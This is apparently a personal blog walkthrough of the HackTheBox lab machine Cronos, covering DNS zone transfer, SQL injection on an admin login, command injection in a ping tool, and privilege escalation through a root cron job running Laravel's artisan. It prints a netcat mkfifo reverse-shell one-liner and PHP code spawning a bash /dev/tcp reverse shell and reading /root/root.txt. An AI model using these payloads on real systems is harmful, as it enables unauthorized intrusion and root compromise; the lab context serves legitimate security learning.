Cronos — HTB Machine

Rishabh Rai
5 min readMar 30, 2024

Today we are going to solve another machine called Cronos….. I have fired it up and run my nmap script to give me initial scans which shows three ports open let’s dig deeper into those……

Upon visiting the webpage :

When clicked on Documentation it takes me to the documentation page of laravel….

Since everythign was very simple and i couldn’t find anything i tried Gobuster and Sublist3r both to find out vhost/subdomain to the parent domain but Due to some reason i was unable to find anything. When i did some research i found out I am on the right path so. I restarted the machine and then tried again..

i was still not able to get any vhost from the machine …..
Then I came across a command which helped me to get the value for the subdomain

host -l <domain_name> <IP>

I will add admin.cronos.htb in the hosts file …….

Upon loading the admin page I only got a simple login page then i started dirsearch on the domain.. admin.cornos.htb
Found config.php but it was supposedly a rabbit hole …

Didn’t find anything in diectory listing as well……

We do have a cookie here

I tried SQL injection on the tool and found this …….

Net tool is a tool that gives you two functionality :
One → to traceroute
Two → to PING

Hindering with the burp request of PING i got command injection on the mahcine

Since we have command injection so we can execute a command and then get a reverse shell

used this
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f

payload and URL encoded it to run on the box

  • * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

I changed the content of atrisan and i did got a connection request but it did not give me a reverse shell on my machine

I tried some more times but it did not work so I had to get creative and get the root flag

Content of Artisan:

// Change these values accordingly
$ip = ‘’;
$port = 1456;

// Create a TCP/IP socket
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);

// Attempt to connect to the provided IP and port
if (socket_connect($sock, $ip, $port) === false) {
die(‘Could not connect to ‘ . $ip . ‘:’ . $port . PHP_EOL);

// Set socket to non-blocking mode

// Spawn a shell
shell_exec(‘bash -c “bash -i >& /dev/tcp/’ . $ip . ‘/’ . $port . ‘ 0>&1”’);
$output = shell_exec(‘cat /root/root.txt’);
file_put_contents(‘/var/www/laravel’, $output);

>>>> root.txt has the content of root flag

That is how we have PAWNED another machine for the day!! HAPPY HACKING UNTIL NEXT TIMEEE

My Review:
This box is a fundamental one and you might have to think out of the box in the start and end other than that the journey in the middle is a breeze if you are up for it. There are several rabbit holes. SO MIND YOUR STEPS !! 😂😁

Join me on various platforms to discuss Cybersecurity and Cloud-related topics. From security best practices to cloud infrastructure, let’s exchange ideas and insights and stay ahead of the curve..




Rishabh Rai

4th year student exploring the world of cyber security with a knack for writing and always learning.